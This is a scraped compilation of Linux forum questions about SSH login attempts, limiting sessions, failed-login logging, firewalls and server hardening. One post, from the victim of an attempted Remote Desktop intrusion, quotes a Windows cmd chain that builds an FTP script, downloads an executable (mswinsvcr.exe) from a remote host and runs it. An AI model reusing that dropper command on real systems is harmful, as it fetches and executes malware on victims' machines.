Security :: Huge Number Attempted Ssh Logins?

Sep 12, 2010

Lastb often shows me a huge list of attempted ssh logins, such as this excerpt:

Code:
admin ssh:notty Sat Sep 11 23:47 - 23:47 (00:00) 184-154-37-12.Huge-DNS.COM
root ssh:notty Sat Sep 11 23:47 - 23:47 (00:00) 184-154-37-12.Huge-DNS.COM

[code]....


Server :: Limit The Number Of Logins For A User To Only One?

May 3, 2011

I ran into a user today that indicated that their company only allows them to log in through a terminal session once (no multiple logins). On the second try their login window terminates. They are using PuTTY. Is this being accomplished through PAM or sshd (or some other method)?


Software :: Need To Transfer Huge Number Of Files - Good FTP Program?

Oct 26, 2009

I need to transfer a massive amount of data (2.5 terabytes, many files, directory structure) to an embedded raid-box which has a minimal linux on it (some custom distro from western digital). We tried rsync (version 2.6.7), but it crashes because the file list is too big for the RAM available (fixed in later versions of rsync, but I don't know how to update, it's not debian based and there are no compiler tools). We tried nfs, but the max bandwidth produced is around 1 mb/sec (cpu bound?), so it'd take around 3 weeks this way. Samba has problems with big files (and we have some 20gb files in there).

SCP isn't installed, and would probably also be cpu bound due to encryption I think. So the only option left would be ftp. We're currently trying ncftp with the command "put -R /path/to/data/", but it's been running for over an hour, eating up most of the RAM, and not using any bandwidth. I think it is still building a file list or something. FTP already worked for a single 20gb file with acceptable bandwidth of about 12mb/sec. Does anyone know a better ftp program (for console) that can start transferring some data or at least display an estimated time for the copy preparation?


Programming :: Implement User Ranking In Php With A Huge Number Of Users?

Aug 21, 2010

I'm writing a user ranking module for a site. This ranking depends on some criteria, and it's possible to set or unset any one of these criteria in order to consider them in calculating the user rank or not. And here's the way I've implemented the ranking calculation:

When I set one or more of the criteria to be considered in ranking, for each user in the system I insert one record for each criterion. For example, if I have 2 criteria and both are set, and I have two users, I'll have:

Ranking table
--------------
username | criteria | to_be_added | score
--------------------------------------------------
user1 | criteria1 | 1 | 0

[code]....

It means I just set the to_be_added field to 1 for all of them and leave the calculation of the score for each criterion for each user to the time the user logs in, so as to prevent doing all these calculations at once, because there are a huge number of users. But there is one problem: if I want to show, for example, the best user (based on the highest score), the result can't always be true because some users might not be logged in at that time and their score might be zero.


Security :: Detect All User Logins?

May 25, 2011

I would like to detect every login on my server. Not only ssh logins (virtual terminals) but also physical logins. There is a way to use nagios or a script to watch log files. But I would like to know: is there a way to catch that information one step before? I thought about watching /dev/pts for changes, but that is not different than log watching, and not everything appears in /dev/pts, like a ssh tunnel (ssh -N user@server). These are only visible in logs because ssh tunnels do not open terminals. But I would like to be able to catch these on login.


Security :: Lock Out Logins At The Console?

May 12, 2009

Is there a way to lock out logins at the console? I ask this because I can not login at the console but can remotely login to the system via ssh. I'm guessing I blindly implemented a security option and didn't know what I was doing when I did it.


Security :: Monitoring Ssh - How To Get IP From Failed Logins

Nov 30, 2010

How do I monitor who is ssh'ing into a box (SLES) as well as failed attempts? How can I log their IP addresses, even if they're not in DNS? In /var/log/messages I see their hostname but no IP address.


Ubuntu Security :: Unwanted Remote Desktop Access And Attempted Hack

Jul 20, 2010

I was running ubuntu 10.04 on a school laptop connected to the network. I was editing a file in emacs on an ssh connection to a school server when all of a sudden I saw the remote desktop graphic (a thing that looks like a widescreen monitor) pop up in the top panel. A second later it announced that someone else had connected to my computer with 'ffff:someip'. I'm not sure of the specifics because I was too shocked. I do remember it started with some number of f's before a ':'. The hacker then started typing:
Code:
%systemroot%system32cmd.exe
del eq&e

I promptly yanked out the ethernet cable before anything else could be typed. I then went in and changed the Remote Desktop preferences to not allow anyone in. I'm guessing that I cut the hacker off from fully entering in a command similar to this:
Code:
%systemroot%system32cmd.exe
del eq&echo open 0.0.0.0 13643 >> eq&echo user 13302 30046 >> eq &echo get
mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq
which I found here: [URL]

How concerned should I be? It appears to be a windows hack. Did I prevent any damage from occurring? Is Remote Desktop really that easy to connect to another person's computer? I know this question is bait in a way. On my home machines I only allow vnc via ssh tunnels and that is through a router with proper port forwarding for the ssh ports and very few other ports forwarded. Such an attack has never happened to me at home. Is this possibly due to my setup or was I just lucky no one picked my computer to hack? So is the ssh tunnel & port forwarding a sufficiently safe setup or am I still at risk?

What degree of protection does the ssh tunnel and port forwarding provide? What else should I do to make my current home setup even more secure? The text I wrote above was the only text typed into the terminal. Because the attack was over Remote Desktop, what is the possibility that it was a bot? The text appeared slow enough for me to think that there was a person rather than a machine/program typing in the text. Does the Remote Desktop connection in a way provide a level of abstraction that prevents scripts as commands must be typed in through the Remote Desktop connection (vs. a ssh connection where a script might more easily be uploaded and executed)?

In the end I'm curious as to what else might have been accessed over the connection or if it was probably just restricted to the hacker attempting to run some windows commands? Since they connected via Remote Desktop and I saw the connection pop up and the typing begin in my terminal, did I see everything that the hacker attempted to perform? Am I correct in my research in finding that there is no log for Remote Desktop connections and therefore I can't find the ip they were connecting from? However, I would like to use this as a wake up call to myself to prevent unwanted access on my home computers.


Security :: Setting Up Secure Remote Logins

Jun 17, 2010

I'm trying to secure the CentOS servers on our company network as the current situation is, shall we say, less-than-ideal: remote root logins with the same password across several servers (behind a firewall, on non-standard ports, but still) and several key processes running as root. My proposal to amend this consists of the following:

- setup a bare as possible SSH-gateway with only the normal user accounts to handle remote access
- disable the root login from anywhere else but LOCAL and create special accounts with root permissions for our ~4 system administrators, like admin.foo admin.bar that can only login from inside the company network, using SSH-keys.

So far my biggest obstacle seems to be creating the administrative users, how do I go about and do that? When I simply create a user adminfoo with uid=0 it will show on my shell as root, which makes it useless as a way to make our admins accountable for their actions. BTW, my initial proposal to use sudo unfortunately met with strong resistance, because it compromises usability.


Fedora Security :: Get Pam_tally2 To Block Failed Logins With Ssh?

Aug 1, 2011

I have been trying to get pam_tally2 to block failed logins with ssh. No matter how many failed logins I do I can still log in with the correct password using SSH. Anyone have this working?

Here is the configuration I am using. I have put this in sshd and password-auth-ac.

auth required pam_tally2.so deny=3 file=/var/log/tallylog lock_time=180 unlock_time=1200 magic_root
account required pam_tally2.so magic_root

In /var/log/secure I do see messages related to pam_tally2 and the counter going up.


Security :: Failed Logins Are Logged To Syslog With The Login Id Set To UNKNOWN Or UNSET?

Jun 10, 2011

Failed login attempts are logged to syslog with the user id or login id set to UNKNOWN_USER or UNSET. Does anybody know if this is configurable? I would rather it just pass the actual id that the user used. It doesn't matter if it exists or not; I just want to know if someone is guessing at user names and what those user names are.


Fedora :: Spideroak HUGE Security Flaw

Feb 18, 2011

I've evaluated about 15 offline storage systems this week, and one of the best was spideroak, but there's a huge issue in their shared folder structure and procedure. When you make part of your data shareable you MUST share a folder from your original disk. This is a real pain. You cannot share specific files like you can on many others. To initiate sharing you establish your unique username for sharing (different preferably than your spideroak username), the share name, and the room key (password). While you might expect the share name to be part of the URL that guides you to the share which then accepts your password for access, that's not how it works. Instead spideroak gives you a URL that contains the PASSWORD and does not even mention the share name!!

Therefore anyone you give the URL to has direct access to the share you create (which is what you are trying to accomplish in general), but any browser THEY USE will remember the URL which contains the password, not the share name. THIS IS A HUGE SECURITY ISSUE since you have no control over how an authorized user is going to access your data and from where, and most users are not sophisticated enough to guard against the default intrusion they are going to leave behind.


Ubuntu Security :: Hardened Baseline - Hook The Logins Into Either Enterprise Kerberos Or Active Directory (yuck)

Dec 14, 2010

I'm tasked with creating a base image of ubuntu (one for server, one for workstation) that is locked down and has all the fluff taken out (naturally workstation will have more fluff left in it than server). Task list looks about like this:

1. Create list of deb packages "allowed", write script to list/uninstall everything else.

2. Hook the logins into either enterprise kerberos or Active Directory (yuck).

3. Write scripts to check things like setuid/setguid, disabling su, checking sudo permissions, configure iptables, etc.

4. Use a scanner to scan the system from outside the system (was thinking of using backtrace).

5. Custom-compile the kernel to strip out all the unneeded modules.

Before embarking on this awesome task I figured I'd check with you guys to see if you know of some resources that would make this task easier/quicker. I'm sure someone out there has already headed down this branch.

PS My boss *loves* ubuntu and isn't too keen on going with a deb (or other) distro that is already "security trimmed" without some serious convincing. I'm sure there are some out there, and if you want to pass along a couple for consideration, I'll check them out, but no guarantees he'll let me use it.


Security :: Limit The Number Of Ssh Connections?

Dec 13, 2010

Dist: Fedora 14
SSHD: OpenSSH 5.5p1

I need to limit the number of ssh connections a user has. All the users are using tunnel only, so their shell is set to /sbin/nologin. The logins do not open a shell, they just create the tunnel, so /etc/security/limits.conf has no effect on them at all.

I tried setting 'MaxSessions 1' in sshd_config, but either that does not do what I expect it to or it plain does not work, as even with a normal user I was able to open an unlimited number of sessions. I need a good secure way to limit each user to 1 ssh session without them having a shell, but I'm unable to find a solution.


SUSE :: Number Of Users Logged In - Security?

Oct 25, 2010

Just noticed this, when I am logged into OpenSuse 11.3 under my default user (autologin) I have 3 of the same user logged in, eg when I run top it shows 3 users and when I run the users command it shows the same user 3 times. Is there any reason for this? Do I need to investigate this at all?


Security :: Restrict Number Of Sftp Connections?

Nov 9, 2010

If I want a user not to have more than 20 sftp connections to a server, is there any way we can limit the number of connections for a particular user on the server using ssh configuration?


Security :: Limit Number Of Emails Send From One IP?

May 19, 2009

I'm looking for a solution for sendmail to limit the number of emails sent per minute per IP. For example, all my local computer users with IP 192.x.x.x need to be able to send 10 emails/minute (emails, not connections!). The rest of the world can send, for example, 200 emails/minute to the mailserver. If the amount of emails per minute is exceeded, sendmail needs to block receiving emails from the specific IP. I want to do this to stop spamming from my local network. Is it possible?


General :: Check Number Of Pending Security Updates In Ubuntu

Oct 15, 2010

I have been forbidden to enable automatic updates on our Ubuntu servers, for both security and regular packages. When I log into any of my four Ubuntu servers, the welcome message contains this:

39 packages can be updated.
26 updates are security updates.

However, when I run the Nagios plugin that monitors APT, I get:

% /usr/lib/nagios/plugins/check_apt
APT WARNING: 33 packages available for upgrade (0 critical updates).

I need to know how to properly detect that there are pending security updates, and regular updates. Once I can do that, I plan to write a Nagios script that will return WARNING for pending regular updates, and CRITICAL for pending security updates.


Ubuntu Security :: Possible To Limit Number Of Prompts For Keyring Password?

Jan 18, 2010

I have a standard home set-up for my Ubuntu OS, and I would like to know whether it's possible to cut out the repetitive prompts to enter the password, as when you connect to the internet or access files on a partition that's not home, or install new software.


Ubuntu Security :: Cannot Connect To Port Number / When Firewall Is Enabled

Sep 5, 2010

I am using 9.10 Karmic. The firewall is enabled. I added ports with ufw allow [portnumber], and I still cannot connect to a port number. I've tried ufw allow ssh/tcp but that does not work. The ports work when I disable the firewall, and I don't want to do that.

ufw is available in all new installations of Ubuntu since 8.04 LTS, but is disabled by default. The standard Ubuntu installation has a no open service ports policy, so enabling the firewall by default doesn't gain any extra security in the default installation, but could provide confusion for people new to Ubuntu when new software that is installed does not work because of restrictive firewall rules. As a result, when first adding ufw to Ubuntu it was decided that users must 'opt-in' to using the firewall. In Ubuntu 9.04 and later, you can enable ufw during installation using preseeding. See /usr/share/doc/ufw/README.Debian for details.


Ubuntu Security :: Making A Hardware Random Number Generator

Apr 1, 2011

I'd like to somehow connect a serial port to a headphone jack, plug it into the geiger counter and literally dump random noise from the geiger counter into the entropy pool used by /dev/random


Security :: Limit Number Of Connections For Single Ip On Port 80 To CentOS 5.5

Sep 5, 2010

How to limit the number of connections for a single IP on port 80 to CentOS 5.5 with iptables? connlimit did not work on CentOS and nginx does not provide a module for that.


Security :: Saw A Number Of Clients (customers) With Some Fun Characters Entries On Database?

Feb 16, 2011

My Linux server, which is running my company website, has been hacked. Today I saw a number of clients (customers) with some fun character entries in my database. Access is denied for real clients. Please assist; I am running Linux Ubuntu 9 and I don't know where to start troubleshooting this. Let me confess that I am still on the learning curve with Linux.


Ubuntu Security :: One Limit The Number Of Open Sockets To Prevent Exploiting?

Dec 6, 2010

I was searching around and I stumbled upon a Linux Kernelix Sockets Local Denial of Service exploit. I downloaded the exploit, compiled it and ran it to check if I am vulnerable. As I was expecting, the exploit instantly "killed" my Maverick system and I had to use the power button to reset my computer... Is there any way to limit the number of allowed open sockets? I don't think that this can be done using /etc/security/limits.conf in a similar way to preventing fork bombs.


Security :: Ssh - Sshd Parameter To Set To Block Out User After Number Of Attempts Tp Login?

Apr 28, 2011

Is there an ssh or sshd parameter that can be set to block out a user after a set number of attempts to log in?


Security :: Display Of Number Of Failed Logon Attempt At Logon?

Jan 26, 2010

Our system is based on RH4 and is using pam_tally and faillog to record failed attempts and to lock users out after 5 attempts. We have a requirement to provide a normal (non-root) user logging onto our system, with information regarding the number of failed logon attempts made on their account before the current successful logon (similar to the functionality provided by HP Protect Tools on Windows). My first idea was to add 'faillog -u $USER' to the bashrc, however by the time the bashrc is run - the user has been successfully authenticated and the faillog has been reset back to zero.


Programming :: Division By Zero Attempted Error?

Apr 28, 2011

I am getting the following error message; please help me solve it.

[root@localhost a]# awk -f dream2.awk simple.tr >simple1.tr
awk: dream2.awk:29: (FILENAME=simple.tr FNR=53107) fatal: division by zero attempted
[root@localhost a]#


Ubuntu :: Sound Not Working After Attempted OSS Switch

Jul 23, 2010

I followed this guide: [url] to try to switch to OSS. Now the sound doesn't work at all. How do I undo these changes and switch back to ALSA?


General :: Initramfs - Attempted To Kill Init ?

Nov 10, 2010

For a special purpose I needed a initramfs - that didn't work. So I reduced the initramfs setup to the simplest.

Mount the root and switch_root into it. But that didn't work either.

If I go with the init-script for the initramfs I posted below the system prints out the switch_root usage-text from busybox. But the syntax is right, ain't it?

When I use chroot instead of switch_root then it prints the usage-text of init before the kernel panic.

If I try with "/sbin/init 5" then, after a while the system reports "init: timeout opening/writing control channel /dev/initctl".

In the other cases I get the following error messages before the system hangs: "Kernel Panic", "Attempted to kill init", "init not tainted"

(With the init script below there is an error saying: "sh: can't access tty; job control turned off". I know why it's there - but don't know if it is connected to this problem.)

This information may be important:
- The machine boots from a usb-harddisk
- /sbin/init on the new root is available
- the system on newroot is sane and runs perfect standalone (without initramfs)
- the system on newroot uses baselayout-2 with openrc
- busybox is built as static binary
- busybox version is v1.15.3

Here is the relevant data:

My uname -a on that machine:

Code:

Content of the initramfs:

Code:


CentOS 5 :: Not Syncing - Attempted To Kill Init

Sep 23, 2009

I downloaded the 6 CDs of the CentOS installation, and I started installing them on my machine:
Processor: Intel Pentium 4 - 2.08 Ghz
RAM: 256 MB
Cache: 512kb
HDD: 80GB
(it is for home server purposes)

After the fourth disc the system asked to reboot, so I restarted it. What did I get? No OS, just a long text.
I think the bootup ran OK, then this line came out; I think it reveals something that pros will recognize:
nash received SIGSEGV Backtrace :
[0x804fb35]
[0x488420]
[0x.........
[0x........
[0x......]
then
Kernel panic - not syncing: Attempted to kill init!








Copyrights 2005-15 www.BigResource.com, All rights reserved